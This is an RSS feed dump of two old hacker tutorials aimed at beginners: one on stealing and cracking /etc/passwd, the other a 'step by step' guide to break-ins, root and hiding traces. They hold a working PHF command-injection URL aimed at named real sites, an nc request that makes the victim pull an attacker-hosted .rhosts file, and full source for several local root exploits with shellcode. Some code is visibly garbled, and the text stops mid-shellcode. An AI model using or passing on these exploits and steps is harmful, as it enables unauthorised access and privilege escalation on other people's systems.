&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Hacking Servers A Beginner's Guide</title><link>http://crack0hack.wetpaint.com/page/Hacking+Servers+A+Beginner%27s+Guide</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Hacking+Servers+A+Beginner%27s+Guide</guid><pubDate>Fri, 25 Jul 2008 03:25:32 CDT</pubDate><description>Hacking Servers: A Beginner&amp;#39;s Guide
By: Lord Dredd

I am asked at least 5 or more times a day by young, beginning &amp;quot;hackers&amp;quot;, &amp;quot;How can I hack?&amp;quot; or &amp;quot;Is there a way to hack a web site?&amp;quot; Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don&amp;#39;t know.

Part 1: Simple UNIX Commands

Most DOS commands have UNIX and Linux equivalents. Listed below are some of the main commands you will need to know to use a shell account.

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD

To see who else is on the system you can type WHO. To get information about a specific user on the system type FINGER &amp;lt;username&amp;gt;. Using those basic UNIX commands you can learn all you need to know about the system you are using.

Part 2: Cracking Passwords

On UNIX systems the file that contains the passwords for all the users on the system is located in the /etc directory. The filename is passwd. I bet you&amp;#39;re thinking.... &amp;quot;Great. All I have to do is get the file called /etc/passwd and I&amp;#39;ll be a hacker.&amp;quot; If that is what you are thinking then you are dead wrong. All the accounts in the passwd file have encrypted passwords. These passwords are one-way encrypted which means that there is no way to decrypt them.
However, there are programs that can be used to obtain passwords from the file. The name of the program that I have found to be the best password cracker is called &amp;quot;Cracker Jack.&amp;quot; This program uses a dictionary file composed of thousands of words. It compares the encrypted forms of the words in the list to the encrypted passwords in the passwd file and it notifies you when it finds a match. Cracker Jack can be found at my web site which is at http://www.geocities.com/SiliconValley/9185

Some wordlists can be found at the following ftp site: sable.ox.ac.uk/pub/wordlists. To get to the wordlist that I usually use go to that ftp site then go to the American directory. Once you are there download the file called dic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressed using a program like Gzip for DOS or Winzip for Windows. After uncompressing the file it should be a text file around 8 MB and it is best to put it in the same directory as your cracking program. To find out how to use Cracker Jack just read the documentation that is included with it.

Part 3: The Hard Part (Finding Password Files)

Up till now I have been telling you the easy parts of hacking a server. Now we get to the more difficult part. It&amp;#39;s common sense. If the system administrator has a file that has passwords for everyone on his or her system they are not going to just give it to you. You have to have a way to retrieve the /etc/passwd file without logging into the system. There are 2 simple ways that this can sometimes be accomplished.

Often the /etc directory is not blocked from FTP. To get the passwd file this way try using an FTP client to access the site anonymously then check the /etc directory to see if access to the passwd file is restricted. If it is not restricted then download the file and run Cracker Jack on it. If it is restricted then try plan B.

On some systems there is a file called PHF in the /cgi-bin directory.
If there is then you are in luck. PHF allows users to gain remote access to files (including the /etc/passwd file) over the world wide web. To try this method go to your web browser and type in this URL:

http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Then substitute the site you are trying to hack for the xxx.xxx.xxx. For example, if I wanted to hack St. Louis University (and I have already) I would type in

http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Don&amp;#39;t bother trying www.slu.edu because I have already done it and told them about their security flaw. Here&amp;#39;s a hint: try www.spawn.com and www.garply.com

If the preceding two methods fail then try any way you can think of to get that file. If you do get the file and all the items in the second field are X or ! or * then the password file is shadowed. Shadowing is just a method of adding extra security to prevent hackers and other unwanted people from using the password file. Unfortunately there is no way to &amp;quot;unshadow&amp;quot; a password file but sometimes there are backup password files that aren&amp;#39;t shadowed. Try looking for files such as /etc/shadow and other stuff like that.

Part 4: Logging In To &amp;quot;Your&amp;quot; New Shell

OK....This is where you use what you found using Cracker Jack: usernames and passwords. Run your telnet client and telnet to the server that you cracked the passwords for, such as www.slu.edu. When you are connected it will give a login screen that asks for a login name and password and usually information on the operating system that the server is using (usually UNIX, linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just type in the information you got after cracking the passwd file and whatever you know about UNIX to do whatever you feel like doing. But remember that hacking isn&amp;#39;t spreading viruses or causing damage to other computer systems.
It is using your knowledge to increase your knowledge.

Part 5: Newbie Info

If you feel that you have what it takes to be a serious hacker then you must first know a clear definition of hacking and how to be an ethical hacker. Become familiar with unix environments and if you are only just starting to learn to hack, visit a local library and find some books on various operating systems on the internet and how they work. Or you could go to a book store and buy a couple internet security books. They often explain how hackers penetrate systems and that is something a beginner could use as an advantage.

&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Hacking step by step User's guide</title><link>http://crack0hack.wetpaint.com/page/Hacking+step+by+step+User%27s+guide</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Hacking+step+by+step+User%27s+guide</guid><pubDate>Fri, 25 Jul 2008 03:23:33 CDT</pubDate><description>&lt;div align=&quot;center&quot;&gt;&lt;div align=&quot;left&quot;&gt;Hacking step by step User&amp;#39;s guide
__________________________

Well, howdi folks... I guess you are all wondering who&amp;#39;s this guy (me) that&amp;#39;s trying to show you a bit of everything...? Well, I ain&amp;#39;t telling you anything of that... Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could do better, don&amp;#39;t read the below information... This file is for educational purposes ONLY...;) I ain&amp;#39;t responsible for any damages you made after reading this... (I&amp;#39;m very serious...) So this can be copied, but not modified (send me the changes, and if they are good, I&amp;#39;ll include them). Don&amp;#39;t read it, &amp;#39;cuz it might be illegal. I warned you... If you would like to continue, press &amp;lt;PgDown&amp;gt;.

Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain&amp;#39;t exactly for beginners, but it&amp;#39;ll have to do. What all hackers have to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we&amp;#39;ll see exactly what I meant.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site. I&amp;#39;ll try to explain the most used ones. The first thing I do is see if the system has an export list:

mysite:~&amp;gt;/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it&amp;#39;s time to search another way in. What I was trying to do was to exploit an old security problem in most SUN OS&amp;#39;s that could allow a remote attacker to add a .rhosts to a user&amp;#39;s home directory... (That was possible if the site had mounted their home directory.) Let&amp;#39;s see what happens...

mysite:~&amp;gt;/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~&amp;gt;mkdir /tmp/mount
mysite:~&amp;gt;/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~&amp;gt;ls -sal /tmp/mount
total 9
1 drwxrwxr-x   8 root   root   1024 Jul  4 20:34 ./
1 drwxr-xr-x  19 root   root   1024 Oct  8 13:42 ../
1 drwxr-xr-x   3 at1    users  1024 Jun 22 19:18 at1/
1 dr-xr-xr-x   8 ftp    wheel  1024 Jul 12 14:20 ftp/
1 drwxrx-r-x   3 john   100    1024 Jul  6 13:42 john/
1 drwxrx-r-x   3 139    100    1024 Sep 15 12:24 paul/
1 -rw-------   1 root   root    242 Mar  9  1997 sudoers
1 drwx------   3 test   100    1024 Oct  8 21:05 test/
1 drwx------  15 102    100    1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper&amp;#39;s home.

mysite:~&amp;gt;id
uid=0 euid=0
mysite:~&amp;gt;whoami
root
mysite:~&amp;gt;echo &amp;quot;rapper::102:2::/tmp/mount:/bin/csh&amp;quot; &amp;gt;&amp;gt; /etc/passwd

We use /bin/csh &amp;#39;cuz bash leaves a (Damn!) .bash_history on the remote server... forget it.

mysite:~&amp;gt;su - rapper
Welcome to rapper&amp;#39;s user.
mysite:~&amp;gt;ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x   8 root   root   1024 Jul  4 20:34 ./
1 drwxr-xr-x  19 root   root   1024 Oct  8 13:42 ../
1 drwxr-xr-x   3 at1    users  1024 Jun 22 19:18 at1/
1 dr-xr-xr-x   8 ftp    wheel  1024 Jul 12 14:20 ftp/
1 drwxrx-r-x   3 john   100    1024 Jul  6 13:42 john/
1 drwxrx-r-x   3 139    100    1024 Sep 15 12:24 paul/
1 -rw-------   1 root   root    242 Mar  9  1997 sudoers
1 drwx------   3 test   100    1024 Oct  8 21:05 test/
1 drwx------  15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy&amp;#39;s home directory...

mysite:~&amp;gt;echo &amp;quot;+ +&amp;quot; &amp;gt; rapper/.rhosts
mysite:~&amp;gt;cd /
mysite:~&amp;gt;rlogin victim1.site.com
Welcome to Victim.Site.Com. SunOs ver....(crap).
victim1:~$

This is the first method... Another method could be to see if the site has an open 80 port. That would mean that the site has a web page. (And that&amp;#39;s very bad, &amp;#39;cuz it&amp;#39;s usually vulnerable). Below I include the source of a scanner that helped me when NMAP wasn&amp;#39;t written. (Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor). NMAP is a scanner that does even stealth scanning, so lots of systems won&amp;#39;t record it.
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;ctype.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;netinet/in.h&amp;gt;
#include &amp;lt;arpa/inet.h&amp;gt;
#include &amp;lt;errno.h&amp;gt;
#include &amp;lt;netdb.h&amp;gt;
#include &amp;lt;signal.h&amp;gt;

int main(int argc, char **argv)
{
  int probeport = 0;
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf(&amp;quot;Usage: %s hostname\n&amp;quot;, argv[0]);
    exit(1);
  }
  /* try a TCP connect to every port below 1024 */
  for (i = 1; i &amp;lt; 1024; i++) {
    strncpy((char *)&amp;amp;sa, &amp;quot;&amp;quot;, sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&amp;amp;sa.sin_addr, (char *)host-&amp;gt;h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_port = htons(i);
    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net &amp;lt; 0) {
      perror(&amp;quot;\nsocket&amp;quot;);
      exit(2);
    }
    err = connect(net, (struct sockaddr *) &amp;amp;sa, sizeof sa);
    if (err &amp;lt; 0) {
      printf(&amp;quot;%s %-5d %s\r&amp;quot;, argv[1], i, strerror(errno));
      fflush(stdout);
    } else {
      printf(&amp;quot;%s %-5d accepted. \n&amp;quot;, argv[1], i);
      if (shutdown(net, 2) &amp;lt; 0) {
        perror(&amp;quot;\nshutdown&amp;quot;);
        exit(2);
      }
    }
    close(net);
  }
  printf(&amp;quot; \r&amp;quot;);
  fflush(stdout);
  return (0);
}

Well, now be very careful with the below exploits, because they usually get logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this sintax : lynx http://www.victim1.com//cgi-bin/finger If you don&amp;#39;t wanna do that, then do a : mysite:~&amp;gt;echo &amp;quot;+ +&amp;quot; &amp;gt; /tmp/rhosts mysite:~&amp;gt;echo &amp;quot;GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts&amp;quot; | nc -v - 20 victim1.site.com 80 then mysite:~&amp;gt;rlogin -l root victim1.site.com Welcome to Victim1.Site.Com. victim1:~# Or, maybe, just try to find out usernames and passwords... The usual users are &amp;quot;test&amp;quot;, &amp;quot;guest&amp;quot;, and maybe the owner of the site... I usually don&amp;#39;t do such things, but you can... Or if the site is really old, use that (quote site exec) old bug for wu.ftpd. There are a lot of other exploits, like the remote exploits (innd, imap2, pop3, etc...) that you can find at rootshell.connectnet.com or at dhp.com/~fyodor. Enough about this topic. (besides, if you can finger the site, you can figgure out usernames and maybe by guessing passwords (sigh!) you could get access to the site). Step 2: Hacking r00t. ______ First you have to find the system it&amp;#39;s running... a). LINUX ALL versions: A big bug for all linux versions is mount/umount and (maybe) lpr. /* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::&amp;quot;&amp;quot;`````&amp;quot;&amp;quot;::::::&amp;quot;&amp;quot;`````&amp;quot;&amp;quot;::&amp;quot;```&amp;quot;:::&amp;#39;&amp;quot;```&amp;#39;.g$$S$&amp;#39; `````````&amp;quot;&amp;quot;::::::::: :::::&amp;#39;.g#S$$&amp;quot;$$S#n. .g#S$$&amp;quot;$$S#n. $$$S#s s#S$$$ $$$$S&amp;quot;. 
$$$$$$&amp;quot;$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S&amp;#39; `S$$$$s$$$$S&amp;#39; `S$$$$s$$$$S&amp;#39; $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask &amp;amp; Vio Covin Security 1996 */   #include #include #include #include #include  &amp;lt;unistd.h&amp;gt; &amp;lt;stdio.h&amp;gt; &amp;lt;stdlib.h&amp;gt; &amp;lt;fcntl.h&amp;gt; &amp;lt;sys/stat.h&amp;gt;  #define PATH_MOUNT &amp;quot;/bin/mount&amp;quot; #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__(&amp;quot;movl %esp, %eax&amp;quot;); } main(int argc, char **argv) { u_char execshell[] = &amp;quot;\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f&amp;quot; &amp;quot;\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd&amp;quot; &amp;quot;\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh&amp;quot;; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf(&amp;quot;can&amp;#39;t allocate memory\n&amp;quot;); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i &amp;lt; strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i &amp;lt; (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf(&amp;quot;Discovered 
and Coded by Bloodmask and Vio, Covin 1996\n&amp;quot;); execl(PATH_MOUNT, &amp;quot;mount&amp;quot;, buff, NULL); }   /*LPR exploit:I don&amp;#39;t know the author...*/ #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; #define DEFAULT_OFFSET #define BUFFER_SIZE long get_esp(void) { __asm__(&amp;quot;movl %esp,%eax\n&amp;quot;); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = &amp;quot;\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07&amp;quot; &amp;quot;\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12&amp;quot; &amp;quot;\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8&amp;quot; &amp;quot;\xd7\xff\xff\xff/bin/sh&amp;quot;; int i; buff = malloc(4096); if(!buff) { printf(&amp;quot;can&amp;#39;t allocate memory\n&amp;quot;); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i &amp;lt; strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i&amp;lt;2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl(&amp;quot;/usr/bin/lpr&amp;quot;, &amp;quot;lpr&amp;quot;, &amp;quot;-C&amp;quot;, buff, NULL); 50 1023  }  b.) Version&amp;#39;s 1.2.* to 1.3.2 NLSPATH env. variable exploit: /* It&amp;#39;s really annoying for users and good for me... AT exploit gives only uid=0 and euid=your_usual_euid. 
*/ #include &amp;lt;unistd.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;sys/stat.h&amp;gt;   #define path &amp;quot;/usr/bin/at&amp;quot; #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__(&amp;quot;movl %esp, %eax&amp;quot;); } main(int argc, char **argv) { u_char execshell[] = &amp;quot;\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f&amp;quot; &amp;quot;\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd&amp;quot; &amp;quot;\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh&amp;quot;; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf(&amp;quot;can&amp;#39;t allocate memory\n&amp;quot;); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i &amp;lt; strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i &amp;lt; (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf(&amp;quot;AT exploit discovered by me, _PHANTOM_ in 1997.\n&amp;quot;); setenv(&amp;quot;NLSPATH&amp;quot;,buff,1); execl(path, &amp;quot;at&amp;quot;,NULL); } SENDMAIL exploit: (don&amp;#39;t try to chmod a-s this one... 
:) ) /* SENDMAIL Exploit for Linux */   #include #include #include #include #include  &amp;lt;unistd.h&amp;gt; &amp;lt;stdio.h&amp;gt; &amp;lt;stdlib.h&amp;gt; &amp;lt;fcntl.h&amp;gt; &amp;lt;sys/stat.h&amp;gt;  #define path &amp;quot;/usr/bin/sendmail&amp;quot; #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__(&amp;quot;movl %esp, %eax&amp;quot;); } main(int argc, char **argv) { u_char execshell[] = &amp;quot;\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f&amp;quot; &amp;quot;\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd&amp;quot; &amp;quot;\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh&amp;quot;; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf(&amp;quot;can&amp;#39;t allocate memory\n&amp;quot;); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i &amp;lt; strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i &amp;lt; (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf(&amp;quot;SENDMAIL exploit discovered by me, _PHANTOM_ in setenv(&amp;quot;NLSPATH&amp;quot;,buff,1); execl(path, &amp;quot;sendmail&amp;quot;,NULL); 1997\n&amp;quot;);  }   MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT) !!!) /* this is a hack of a hack. a valid System.map was needed to get this sploit to werk.. but not any longer.. This sploit will give you root if the modify_ldt bug werks.. which I beleive it does in any kernel before 1.3.20 .. QuantumG */ /* original code written by Morten Welinder. * * this required 2 hacks to work on the 1.2.13 kernel that I&amp;#39;ve tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed. * 2. the _task in the System.map file has no leading underscore. 
 * I am not sure at what point these were changed, if you are
 * using this on a newer kernel compile with NEWERKERNEL defined.
 * -ReD */

#include &amp;lt;linux/ldt.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;string.h&amp;gt;   /* strcmp */
#include &amp;lt;unistd.h&amp;gt;   /* getpid, getppid */
#include &amp;lt;linux/unistd.h&amp;gt;
#include &amp;lt;signal.h&amp;gt;
#ifdef NEWERKERNEL
#include &amp;lt;asm/sigcontext.h&amp;gt;
#endif
#define __KERNEL__
#include &amp;lt;linux/sched.h&amp;gt;
#include &amp;lt;linux/module.h&amp;gt;

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)

#define KERNEL_BASE 0xc0000000

/* ------------------------------------------------------------------------ */
/* read one byte through the descriptor selected by &amp;#39;seg&amp;#39; */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
    unsigned char res;
    asm (&amp;quot;mov %w1,%%gs ; gs; movb (%2),%%al&amp;quot;
         : &amp;quot;=a&amp;quot; (res)
         : &amp;quot;r&amp;quot; (seg), &amp;quot;r&amp;quot; (ofs));
    return res;
}

/* ------------------------------------------------------------------------ */
/* write one byte through the descriptor selected by &amp;#39;seg&amp;#39; */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
    asm (&amp;quot;mov %w0,%%gs ; gs; movb %b2,(%1)&amp;quot;
         : /* No results. */
         : &amp;quot;r&amp;quot; (seg), &amp;quot;r&amp;quot; (ofs), &amp;quot;r&amp;quot; (b));
}

/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
    while (size-- &amp;gt; 0)
        *(char *)dst++ = __farpeek (seg, (unsigned)(src++));
}

/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
    while (size-- &amp;gt; 0)
        __farpoke (seg, (unsigned)(dst++), *(char *)src++);
}

/* ------------------------------------------------------------------------ */
int
main ()
{
    int stat, i,j,k;
    struct modify_ldt_ldt_s ldt_entry;
    FILE *syms;
    char line[100];
    struct task_struct **task, *taskptr, thistask;
    struct kernel_sym blah[4096];

    printf (&amp;quot;Bogusity checker for modify_ldt system call.\n&amp;quot;);

    printf (&amp;quot;Testing for page-size limit bug...\n&amp;quot;);
    ldt_entry.entry_number = 0;
    ldt_entry.base_addr = 0xbfffffff;
    ldt_entry.limit = 0;
    ldt_entry.seg_32bit = 1;
    ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
    ldt_entry.read_exec_only = 0;
    ldt_entry.limit_in_pages = 1;
    ldt_entry.seg_not_present = 0;
    stat = modify_ldt (1, &amp;amp;ldt_entry, sizeof (ldt_entry));
    if (stat) /* Continue after reporting error. */
        printf (&amp;quot;This bug has been fixed in your kernel.\n&amp;quot;);
    else {
        printf (&amp;quot;Shit happens: &amp;quot;);
        printf (&amp;quot;0xc0000000 - 0xc0000ffe is accessible.\n&amp;quot;);
    }

    printf (&amp;quot;Testing for expand-down limit bug...\n&amp;quot;);
    ldt_entry.base_addr = 0x00000000;
    ldt_entry.limit = 1;
    ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
    ldt_entry.limit_in_pages = 0;
    stat = modify_ldt (1, &amp;amp;ldt_entry, sizeof (ldt_entry));
    if (stat) {
        printf (&amp;quot;This bug has been fixed in your kernel.\n&amp;quot;);
        return 1;
    } else {
        printf (&amp;quot;Shit happens: &amp;quot;);
        printf (&amp;quot;0x00000000 - 0xfffffffd is accessible.\n&amp;quot;);
    }

    /* locate &amp;#39;current&amp;#39; in the exported kernel symbol table */
    i = get_kernel_syms(blah);
    k = i+10;
    for (j=0; j&amp;lt;i; j++)
        if (!strcmp(blah[j].name,&amp;quot;current&amp;quot;) || !strcmp(blah[j].name,&amp;quot;_current&amp;quot;))
            k = j;
    if (k==i+10) {
        printf(&amp;quot;current not found!!!\n&amp;quot;);
        return(1);
    }
    j=k;

    /* read this process&amp;#39;s task_struct, then its parent&amp;#39;s, through the
     * expand-down segment (selector 7 = LDT entry 0, RPL 3) */
    taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
    memgetseg (&amp;amp;taskptr, 7, taskptr, sizeof (taskptr));
    taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
    memgetseg (&amp;amp;thistask, 7, taskptr, sizeof (thistask));
    if (thistask.pid!=getpid()) {
        printf(&amp;quot;current process not found\n&amp;quot;);
        return(1);
    }
    printf(&amp;quot;Current process is %i\n&amp;quot;,thistask.pid);

    taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
    memgetseg (&amp;amp;thistask, 7, taskptr, sizeof (thistask));
    if (thistask.pid!=getppid()) {
        printf(&amp;quot;current process not found\n&amp;quot;);
        return(1);
    }
    printf(&amp;quot;Parent process is %i\n&amp;quot;,thistask.pid);

    /* zero every credential field of the parent and write the struct back */
    thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
    thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
    memputseg (7, taskptr, &amp;amp;thistask, sizeof (thistask));
    printf (&amp;quot;Shit happens: parent process is now root process.\n&amp;quot;);
    return 0;
};

c.)
Other linux versions: Sendmail exploit:

#!/bin/sh
#
#
#   Hi !
#   This is exploit for sendmail smtpd bug
#   (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#   This shell script does a root shell in /tmp directory.
#   If you have any problems with it, drop me a letter.
#   Have fun !
#
#
#   ---------------------
#   --------------------------------------------
#   ---------------- Dedicated to my beautiful lady -----------------
#   --------------------------------------------
#   ---------------------
#
#   Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
# leshka: runs the setuid-root sendmail with argv[0] pointing at /tmp/smtpd.
# On SIGHUP, sendmail 8.7-8.8.2 re-execs the program named by argv[0],
# still with root privileges, so it ends up running our /tmp/smtpd.
echo &amp;#39;main()                                        &amp;#39;&amp;gt;&amp;gt;leshka.c
echo &amp;#39;{                                             &amp;#39;&amp;gt;&amp;gt;leshka.c
echo &amp;#39;  execl(&amp;quot;/usr/sbin/sendmail&amp;quot;,&amp;quot;/tmp/smtpd&amp;quot;,0);   &amp;#39;&amp;gt;&amp;gt;leshka.c
echo &amp;#39;}                                             &amp;#39;&amp;gt;&amp;gt;leshka.c
#
#
# smtpd: what sendmail re-execs as root; it drops a setuid-root copy of sh
echo &amp;#39;main()                                        &amp;#39;&amp;gt;&amp;gt;smtpd.c
echo &amp;#39;{                                             &amp;#39;&amp;gt;&amp;gt;smtpd.c
echo &amp;#39;  setuid(0); setgid(0);                         &amp;#39;&amp;gt;&amp;gt;smtpd.c
echo &amp;#39;  system(&amp;quot;cp /bin/sh /tmp;chmod a=rsx /tmp/sh&amp;quot;); &amp;#39;&amp;gt;&amp;gt;smtpd.c
echo &amp;#39;}                                             &amp;#39;&amp;gt;&amp;gt;smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
# find the pid of the sendmail we just started and HUP it
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d &amp;#39; &amp;#39;|tr -cs &amp;quot;[:digit:]&amp;quot; &amp;quot;\n&amp;quot;| head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo &amp;quot;Now type: /tmp/sh&amp;quot;

SUNOS: Rlogin exploit: (arghh!)
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;   /* strlen */
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#define BUF_LENGTH   8200
#define EXTRA        100
#define STACK_OFFSET 4000
#define SPARC_NOP    0xa61cc013

u_char sparc_shellcode[] =
    &amp;quot;\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13&amp;quot;
    &amp;quot;\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e&amp;quot;
    &amp;quot;\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a&amp;quot;
